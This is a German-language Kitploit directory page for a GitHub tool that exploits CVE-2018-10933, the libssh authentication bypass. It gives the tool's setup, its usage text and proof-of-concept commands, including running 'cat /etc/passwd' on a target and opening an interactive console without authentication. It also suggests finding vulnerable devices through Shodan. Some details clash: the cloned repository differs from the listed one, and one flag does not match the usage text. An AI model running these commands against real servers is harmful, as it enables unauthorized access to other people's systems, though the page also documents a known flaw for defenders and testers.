Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2018-10933 — libSSH-Authentication-Bypass | Kitploit
Tools/GitHubGitHub/rubikcuv5/cve-2018-10933
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationInformationsbeschaffungNetzwerksicherheitPenetrationstests
GitHubrubikcuv5/cve-2018-10933

CVE-2018-10933

libSSH-Authentication-Bypass

Repository anzeigen
123vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2018-10933


Eine Sicherheitslücke wurde in der server-seitigen Zustandsmaschine von libssh vor den Versionen 0.7.6 und 0.8.4 gefunden. Ein böswilliger Client könnte Kanäle erstellen, ohne zuvor eine Authentifizierung durchzuführen, was zu unbefugtem Zugriff führt.

EINIGE DETAILS

Das Problem ergibt sich aus der Art und Weise, wie libssh den Authentifizierungszustand nicht verwaltet und wie dies verwendet werden kann, um die Authentifizierung zu umgehen. Grundsätzlich kann man sich die Verbindung als mehrstufigen Prozess vorstellen: Schritt1, Schritt2, Schritt3... Da libssh die Reihenfolge der Schritte nicht erzwingt, kann man im Grunde zu Schritt3 springen, ohne Schritt1 und Schritt2 zu durchlaufen.

Interessanterweise wurde dasselbe Problem bereits früher in der SSH-Bibliothek Paramiko gefunden: CVE-2018-7750.

Dokumentation

Exploit-DB : https://www.exploit-db.com/exploits/45638

Informationen zu CVE-2018-10933 von libSSH : https://www.libssh.org/security/advisories/CVE-2018-10933.txt

Bugfix-Release von libSSH : https://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/

Einrichtung

root@kitploit:~
sudo apt-get install python3

gh repo clone EmmanuelCruzL/CVE-2018-10933

pip3 install -r requirements.txt

python3 main.py

Verwendung

root@kitploit:~
usage: main.py [-h] [-p PORT] [-log] [-t | -c COMMAND | -i] host

Script for the vulnerabilities CVE-2018-10933

positional arguments:
  host                  the ip or domain address of ssh server

options:
  -h, --help            show this help message and exit
  -p PORT, --port PORT  The port the service ssh, default [22]
  -log, --logfile       Logfile to write conn logs
  -t, --test            check the version of libSSH
  -c COMMAND, --command COMMAND
                        command to execute
  -i, --interactive     open the interactive mode
   

BEISPIELE POC

BEISPIEL (Prüfen, ob der Host verwundbar ist)

root@kitploit:~
python3 main.py  0.0.0.0 -port 22  -t

BEISPIEL (Befehl über Argument senden)

root@kitploit:~
python3 main.py  0.0.0.0 -p 22  -c "cat /etc/passwd"

BEISPIEL (Interaktive einfache Konsole verwenden)

root@kitploit:~
python3 main.py  0.0.0.0 -p 22  -l

Shodan.io libSSH

root@kitploit:~
[!] can find  devices vulnerables using shodan.io 
-  ( 22 Port is default, other ports like (2222, 3333, 4444) might be including libSSH )

Autoren

  • Rubickcuv
Tool herunterladen